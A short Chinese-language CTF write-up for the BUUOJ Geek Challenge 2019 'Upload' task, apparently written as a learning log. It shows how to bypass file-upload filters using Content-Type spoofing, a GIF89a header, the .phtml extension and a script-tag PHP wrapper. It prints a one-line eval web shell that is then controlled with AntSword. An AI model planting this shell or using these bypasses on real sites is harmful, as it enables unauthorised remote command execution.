CTFer成长记录——CTF之Web专题·极客大挑战—Upload
一、题目链接
https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]Upload
二、解法步骤
本题是一个文件上传题目,先测试是黑名单还是白名单:随便上传一个文件,提示:
看来只能上传图片类型,这个时候我们bp抓包并且修改包中的content字段,将其改成jpg等格式,同时给文件加上GIF89a来进行欺骗:
修改后直接上传php还是会被检测,那么改成phtml:
发现对文件内容进行了检测,不能有<? 这样php语言的特征,那么换一个一句话木马,用javascript写的:
GIF89a
<script language="php">@eval($_REQUEST['cmd']);</script>
一样bp抓包修改content:
上传成功,然后用找到文件的上传目录:一般在upload下面:
最后用蚁剑连接:
最后在根目录下找到flag:
三、总结
本题文件上传对文件后缀进行了检查,可以用phtml绕过,如果对文件内容进行php特性检查,可以用js语言代替。